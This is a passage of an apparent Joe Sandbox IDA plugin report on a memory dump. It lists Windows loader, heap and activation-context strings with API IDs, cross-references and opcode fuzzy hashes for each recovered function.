                                                                                    • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                    • API String ID: 0-861424205
                                                                                    • Opcode ID: 03734d5e57e044463617b880ead0842ab43013a2e3d8077f137ba7c2d410c2f4
                                                                                    • Instruction ID: 98198b1c684d7849c95761189c0ad054a15a2381c9fdfacfed7b653cac1bd65d
                                                                                    • Opcode Fuzzy Hash: 03734d5e57e044463617b880ead0842ab43013a2e3d8077f137ba7c2d410c2f4
                                                                                    • Instruction Fuzzy Hash: AD31377AB4022577E721BA9A8C85F5B7B6ADBD5F40F09405EBB05E7280D270EB01D3E1
                                                                                    APIs
                                                                                      • Part of subcall function 01892DF0: LdrInitializeThunk.NTDLL ref: 01892DFA
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01890BA3
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01890BB6
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01890D60
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01890D74
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 1404860816-0
                                                                                    • Opcode ID: 4d17b6022e67d1c0c909fc327ddcb906439485596f03005f88bbe29646aa3d95
                                                                                    • Instruction ID: 31e01fa4a08e50ca555f6f97c8e6c7e4e110c4436f2bb4411258e15201e1c238
                                                                                    • Opcode Fuzzy Hash: 4d17b6022e67d1c0c909fc327ddcb906439485596f03005f88bbe29646aa3d95
                                                                                    • Instruction Fuzzy Hash: 64424A71900715DFDB61CF68C880BAAB7F9BF44314F1845A9E989EB241E770EA84CF61
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                    • API String ID: 0-379654539
                                                                                    • Opcode ID: 0d1a35f85678d8d0d64e3e2b2172c395a1910b37d4ebbabfcef8a3fc44d1d0ad
                                                                                    • Instruction ID: fd3ea969cd5d34d17b2e734040e1910e4ba4603d46c44f9a911f58f3f712a769
                                                                                    • Opcode Fuzzy Hash: 0d1a35f85678d8d0d64e3e2b2172c395a1910b37d4ebbabfcef8a3fc44d1d0ad
                                                                                    • Instruction Fuzzy Hash: 6BC15B741083868FD759CF98C084B6ABBE4FF88748F044A6AF995CB251E734DA49CB52
                                                                                    Strings
                                                                                    • @, xrefs: 01888591
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 01888421
                                                                                    • LdrpInitializeProcess, xrefs: 01888422
                                                                                    • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0188855E
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-1918872054
                                                                                    • Opcode ID: 5dd72ec77a5966f967f84e173e64c65afbd51bbe6b448049cc073e7387aaa53c
                                                                                    • Instruction ID: 575b6da7c5730dba594451920abbdbee9680ca66d611c1b628a5e0bee8aa84ca
                                                                                    • Opcode Fuzzy Hash: 5dd72ec77a5966f967f84e173e64c65afbd51bbe6b448049cc073e7387aaa53c
                                                                                    • Instruction Fuzzy Hash: A1918E71508345AFDB21EF69CC84E6BBAE8BF85754F84092EFA84D2151E334DB44CB62
                                                                                    Strings
                                                                                    • .Local, xrefs: 018828D8
                                                                                    • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 018C21D9, 018C22B1
                                                                                    • SXS: %s() passed the empty activation context, xrefs: 018C21DE
                                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 018C22B6
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                    • API String ID: 0-1239276146
                                                                                    • Opcode ID: 373f0c757e5b99c0c82ced442076d74e3f1d8a0a4a73520e2f07223a98daa334
                                                                                    • Instruction ID: d02da71fcfc9e461818d470323ca22486478b9a6d839c5c58a3d104b5bcb8239
                                                                                    • Opcode Fuzzy Hash: 373f0c757e5b99c0c82ced442076d74e3f1d8a0a4a73520e2f07223a98daa334
                                                                                    • Instruction Fuzzy Hash: CCA1AD3590022A9BDB25EF68CC84BA9B7B6BF58754F1441EAD908E7291D730DF80CF90
                                                                                    Strings
                                                                                    • SXS: %s() called with invalid flags 0x%08lx, xrefs: 018C342A
                                                                                    • RtlDeactivateActivationContext, xrefs: 018C3425, 018C3432, 018C3451
                                                                                    • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 018C3456
                                                                                    • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 018C3437
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                    • API String ID: 0-1245972979
                                                                                    • Opcode ID: e18d17461f36a0f97b8ac297990ae5606dc391f07f80a841ed9e251a8b836977
                                                                                    • Instruction ID: 68a773ef742e9ef1d95b762e8c3cbf2d4ba481ab76a94244eef2bfd2de39d9a0
                                                                                    • Opcode Fuzzy Hash: e18d17461f36a0f97b8ac297990ae5606dc391f07f80a841ed9e251a8b836977
                                                                                    • Instruction Fuzzy Hash: 9561FF36640B129BD722DF1DC881B2AF7A5AFA0B14F18852DE955DB240DB34EA02CB91
                                                                                    Strings
                                                                                    • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 018B1028
                                                                                    • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 018B10AE
                                                                                    • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 018B106B
                                                                                    • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 018B0FE5
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                    • API String ID: 0-1468400865
                                                                                    • Opcode ID: 582a75676490356d6f449afe5a5a4191d5baf8a99e54a36e9f9f56969ff5b4d9
                                                                                    • Instruction ID: bb5a4ba784e4389d53e7f8d0bb6abce5221b3a0ed4827a3a07836768d2a9c7b1
                                                                                    • Opcode Fuzzy Hash: 582a75676490356d6f449afe5a5a4191d5baf8a99e54a36e9f9f56969ff5b4d9
                                                                                    • Instruction Fuzzy Hash: C471E071944305AFCB61DF18C884B9B7BA8EF55768F940468FD49CB246E734D288CBD2
                                                                                    Strings
                                                                                    • LdrpDynamicShimModule, xrefs: 018BA998
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 018BA9A2
                                                                                    • apphelp.dll, xrefs: 01872462
                                                                                    • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 018BA992
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-176724104
                                                                                    • Opcode ID: bc95663a926c956c0d3e56c7881493f6410dc340a3401703c1c9d648c6cc6337
                                                                                    • Instruction ID: 24e4507c6859b76430214a7bdd43687eb63ecfad1578204d03a4c0ec72382fb4
                                                                                    • Opcode Fuzzy Hash: bc95663a926c956c0d3e56c7881493f6410dc340a3401703c1c9d648c6cc6337
                                                                                    • Instruction Fuzzy Hash: F5314679600206ABEB39DF6DC8C1EAABBB5FB84B04F160019F910E7345D7709B81C791
                                                                                    Strings
                                                                                    • HEAP: , xrefs: 01863264
                                                                                    • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0186327D
                                                                                    • HEAP[%wZ]: , xrefs: 01863255
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                    • API String ID: 0-617086771
                                                                                    • Opcode ID: 371259646dad2430d0e28107a68d4f0fcb1f27a41a6ca0deb1c74821c0c37042
                                                                                    • Instruction ID: 9ec07c18247587cbe4c78885d617931bf3eaa0192ad3ab729852b27f41fd9951
                                                                                    • Opcode Fuzzy Hash: 371259646dad2430d0e28107a68d4f0fcb1f27a41a6ca0deb1c74821c0c37042
                                                                                    • Instruction Fuzzy Hash: D392AC71A04249DFDB25CF68C444BADBBF6FF48304F1880A9E859EB392D735AA45CB50
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                    • API String ID: 0-4253913091
                                                                                    • Opcode ID: 25b1dab40e070aa3efe92b7ed187c1d66bb8d65670af3d30c8c5905d271393aa
                                                                                    • Instruction ID: 7bdee9afd174bdda05caceb442870aed2626a9522ed34c889cc869fc30643e50
                                                                                    • Opcode Fuzzy Hash: 25b1dab40e070aa3efe92b7ed187c1d66bb8d65670af3d30c8c5905d271393aa
                                                                                    • Instruction Fuzzy Hash: F4F1AE30A0060ADFEB25CF68C894BAAB7FAFF44704F144168E556DB381D734EA81CB95
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $@
                                                                                    • API String ID: 0-1077428164
                                                                                    • Opcode ID: b567012ed6c5767bcb69cd97f5bac33121957ba9a0a102b02f2aa038579f1ff7
                                                                                    • Instruction ID: 72d16316d84e9daa7c934535f00ed12415f76ae3979574be9bb56c4b718e41ca
                                                                                    • Opcode Fuzzy Hash: b567012ed6c5767bcb69cd97f5bac33121957ba9a0a102b02f2aa038579f1ff7
                                                                                    • Instruction Fuzzy Hash: 4EC2AF716087459FEB25CF28C884BABBBE5AF89714F04892DF999C7341E734DA04CB52
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: FilterFullPath$UseFilter$\??\
                                                                                    • API String ID: 0-2779062949
                                                                                    • Opcode ID: 7cd060681522b40b7ae23f6cabd257631b3a694e8efe15a03f9d797fb6da90c8
                                                                                    • Instruction ID: 703cc8c90dc91be17590a259137a6c40cefeec0793d7b06e953a96f0fab48125
                                                                                    • Opcode Fuzzy Hash: 7cd060681522b40b7ae23f6cabd257631b3a694e8efe15a03f9d797fb6da90c8
                                                                                    • Instruction Fuzzy Hash: 49A16B769116299BEB31DF68CC88BAAB7B8EF44710F1001E9E909EB250D7359F84CF51
                                                                                    Strings
                                                                                    • LdrpCheckModule, xrefs: 018BA117
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 018BA121
                                                                                    • Failed to allocated memory for shimmed module list, xrefs: 018BA10F
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-161242083
                                                                                    • Opcode ID: d0fbac595764a269c3a82e75e4b90d6865f5eefc959f08dccd43eda256894efe
                                                                                    • Instruction ID: 0b62358884c9ca1905b99a4da1b6a94fb489053bf11000fc50d57843b0d0c1b6
                                                                                    • Opcode Fuzzy Hash: d0fbac595764a269c3a82e75e4b90d6865f5eefc959f08dccd43eda256894efe
                                                                                    • Instruction Fuzzy Hash: 3B719D74A0020ADFDB29DF6CC981AAEB7F4EB85708F18402DE946E7351E634AB41CB51
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                    • API String ID: 0-1334570610
                                                                                    • Opcode ID: 14d9e632b53fc218c58e6456c85796ee7d1030b758772b4d6c6bfa5874431625
                                                                                    • Instruction ID: 773cdf607f4576d9ffe7ffddafa2c0dccbcc3821cd2cdf3218978ae87698cdea
                                                                                    • Opcode Fuzzy Hash: 14d9e632b53fc218c58e6456c85796ee7d1030b758772b4d6c6bfa5874431625
                                                                                    • Instruction Fuzzy Hash: 1161AE70604306DFDB29CF28C480BAABBE5FF45708F148559E49ACB396D770EA81CB95
                                                                                    Strings
                                                                                    • LdrpInitializePerUserWindowsDirectory, xrefs: 018C82DE
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 018C82E8
                                                                                    • Failed to reallocate the system dirs string !, xrefs: 018C82D7
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-1783798831
                                                                                    • Opcode ID: 9c87f68726f8ba42d1d8550ab97e8f64c2ff20b6c8084262b4979831f47bca01
                                                                                    • Instruction ID: 07cb9dbbb9de799c54d8f30cb900fd05aa06418f71e75dbc0fc65d8ae1ee02ce
                                                                                    • Opcode Fuzzy Hash: 9c87f68726f8ba42d1d8550ab97e8f64c2ff20b6c8084262b4979831f47bca01
                                                                                    • Instruction Fuzzy Hash: EB41E1B5544315ABC731FB6CD844F9B77E8EB49B58F00492AF948D3258EB70DA008BA2
                                                                                    Strings
                                                                                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0190C1C5
                                                                                    • @, xrefs: 0190C1F1
                                                                                    • PreferredUILanguages, xrefs: 0190C212
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                    • API String ID: 0-2968386058
                                                                                    • Opcode ID: c5d4642e6b88d01a0187aa2cc91468202a07f1709e915a9b702acea590c555f8
                                                                                    • Instruction ID: 97bc7dbe9b71126748025a91b88f78dd4bddd8a8cff3715d8ba0620d0352424c
                                                                                    • Opcode Fuzzy Hash: c5d4642e6b88d01a0187aa2cc91468202a07f1709e915a9b702acea590c555f8
                                                                                    • Instruction Fuzzy Hash: BC416471900209EFDF12DADCC881FEEBBBDAB14701F1441AAE609E7680D774DA44CB51
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                    • API String ID: 0-1373925480
                                                                                    • Opcode ID: 81f702b403c5f5e463829bc0350f12569e2d55fc242cf5ea7ec05b304d2e2a27
                                                                                    • Instruction ID: b9f8dce19498606cd19d5ee78a01f639532214d55a0ae60fd264324c3bc04473
                                                                                    • Opcode Fuzzy Hash: 81f702b403c5f5e463829bc0350f12569e2d55fc242cf5ea7ec05b304d2e2a27
                                                                                    • Instruction Fuzzy Hash: DA410471A00658CBEB25DBD8C848BADBBF8FF96344F140459DA09EB781D7359B01CB51
                                                                                    Strings
                                                                                    • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 018D4888
                                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 018D4899
                                                                                    • LdrpCheckRedirection, xrefs: 018D488F
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                    • API String ID: 0-3154609507
                                                                                    • Opcode ID: 61058598d7baa675802aad18798ec610602b802dda7695ab30ea578bb6dc06b3
                                                                                    • Instruction ID: cc02fce4eee1aaf2c8e9f0e670cc230c9bcdfdc766f5c1915bf2aeefddceb404
                                                                                    • Opcode Fuzzy Hash: 61058598d7baa675802aad18798ec610602b802dda7695ab30ea578bb6dc06b3
                                                                                    • Instruction Fuzzy Hash: CC41D132A043559FCB21CE6DD841A26BBE5BF49B90F06066DED88E7B11D731DA00CB91
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                    • API String ID: 0-2558761708
                                                                                    • Opcode ID: 426b57c3289c1244ee3adbe59b739fe6f121aebe5d5816e89a4441a991852358
                                                                                    • Instruction ID: 588d0e73380e9d4df670e8ba17e24c26826752344f8b74f4e71d21b8d5afd350
                                                                                    • Opcode Fuzzy Hash: 426b57c3289c1244ee3adbe59b739fe6f121aebe5d5816e89a4441a991852358
                                                                                    • Instruction Fuzzy Hash: BD11DF7135510ADFDB2ADB28C4C1BB6B7A8EF41B19F188129F406CB391DB38DA81C755
                                                                                    Strings
                                                                                    • Process initialization failed with status 0x%08lx, xrefs: 018D20F3
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 018D2104
                                                                                    • LdrpInitializationFailure, xrefs: 018D20FA
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-2986994758
                                                                                    • Opcode ID: 795e1de8955b587246c1bea0b5b1606fd46635d444a8e8492df5fcc32e130c4b
                                                                                    • Instruction ID: 39b4608f992118e0d38db1018976a4d5e70f9f06687a67dde5edaba7db71414e
                                                                                    • Opcode Fuzzy Hash: 795e1de8955b587246c1bea0b5b1606fd46635d444a8e8492df5fcc32e130c4b
                                                                                    • Instruction Fuzzy Hash: D5F04678640308BBEB20E66CDC42F993B69FB80B04F140058FB40F7381D6B0AB00C681
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID: #%u
                                                                                    • API String ID: 48624451-232158463
                                                                                    • Opcode ID: 1bd8db06d95bddd9ac0c0c8f5e8a6b86800149bcbcb2448c68bfec6d32d9c885
                                                                                    • Instruction ID: 4e6d14cd85c932cdddf793fc447130f73b7975b1b2ec8f3793a2d6c54d1ca299
                                                                                    • Opcode Fuzzy Hash: 1bd8db06d95bddd9ac0c0c8f5e8a6b86800149bcbcb2448c68bfec6d32d9c885
                                                                                    • Instruction Fuzzy Hash: 50714A71A0014A9FDB11DFADC991BAEB7F8FF18744F144065E905EB252EA34EE01CBA1
                                                                                    Strings
                                                                                    • LdrResSearchResource Exit, xrefs: 0185AA25
                                                                                    • LdrResSearchResource Enter, xrefs: 0185AA13
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                    • API String ID: 0-4066393604
                                                                                    • Opcode ID: d443138f76a504be14bfd559df83b00001cd0065bcdf7821a187d066f5e47cd5
                                                                                    • Instruction ID: cfdccf724e27351f3bec441ee705ff2ca56a09558d07aaf42b85169dc30dee2c
                                                                                    • Opcode Fuzzy Hash: d443138f76a504be14bfd559df83b00001cd0065bcdf7821a187d066f5e47cd5
                                                                                    • Instruction Fuzzy Hash: 01E18B71A00619ABEF668A9DC9C0BEEBBBAFF08314F144626ED01E7351D7349B41CB51
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: `$`
                                                                                    • API String ID: 0-197956300
                                                                                    • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                    • Instruction ID: 472d8d77367e683fcdaecd4c419bf838aa0fdaece21f551d7117d10b7fdf94fe
                                                                                    • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                    • Instruction Fuzzy Hash: 7BC1F43120538A9BE725CF28C840B2BBBE9AFC4754F044E2DF69AC7294D774D985CB41
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: Legacy$UEFI
                                                                                    • API String ID: 2994545307-634100481
                                                                                    • Opcode ID: 94dd3232a3450b7f4d57089eb4d8a32a302c34b18c54751f0452f6282dd6f1c0
                                                                                    • Instruction ID: 5bedaff8ca46b67f8b78f34b513b92b2dbaf43571a46935746b8af5d351dd461
                                                                                    • Opcode Fuzzy Hash: 94dd3232a3450b7f4d57089eb4d8a32a302c34b18c54751f0452f6282dd6f1c0
                                                                                    • Instruction Fuzzy Hash: 8E613D71E007199FDB15DFA8C940BAEBBB9FB48B04F14406DE659EB251D731EA40CB50
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$MUI
                                                                                    • API String ID: 0-17815947
                                                                                    • Opcode ID: 4dc16eb0f5bd0967429218c4907a7bbec785b7596e0534844879b7d0cb4b9815
                                                                                    • Instruction ID: c0452f487f1faec2afbd2c3d35baf8445c6d0b2aab3a528134bd54ec81fa7295
                                                                                    • Opcode Fuzzy Hash: 4dc16eb0f5bd0967429218c4907a7bbec785b7596e0534844879b7d0cb4b9815
                                                                                    • Instruction Fuzzy Hash: F5510971D0121DAEDF11DFA9CC84AEFBBBDEB58754F14052AEA11F7290E6309A05CB60
                                                                                    Strings
                                                                                    • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0185063D
                                                                                    • kLsE, xrefs: 01850540
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                    • API String ID: 0-2547482624
                                                                                    • Opcode ID: 08f430932b3417e6fb41b61828108cf6be3a99d282e247a69a1adddd41d77e89
                                                                                    • Instruction ID: cceabc12dba7fa100cbe9054f36e72991ee8bb2c3889dc0bfa4af989212f5a22
                                                                                    • Opcode Fuzzy Hash: 08f430932b3417e6fb41b61828108cf6be3a99d282e247a69a1adddd41d77e89
                                                                                    • Instruction Fuzzy Hash: 7A51BDB1504B468FD765DF68C5406A7BBE4EF84304F10483EFAAAC7241E774D645CBA2
                                                                                    Strings
                                                                                    • RtlpResUltimateFallbackInfo Enter, xrefs: 0185A2FB
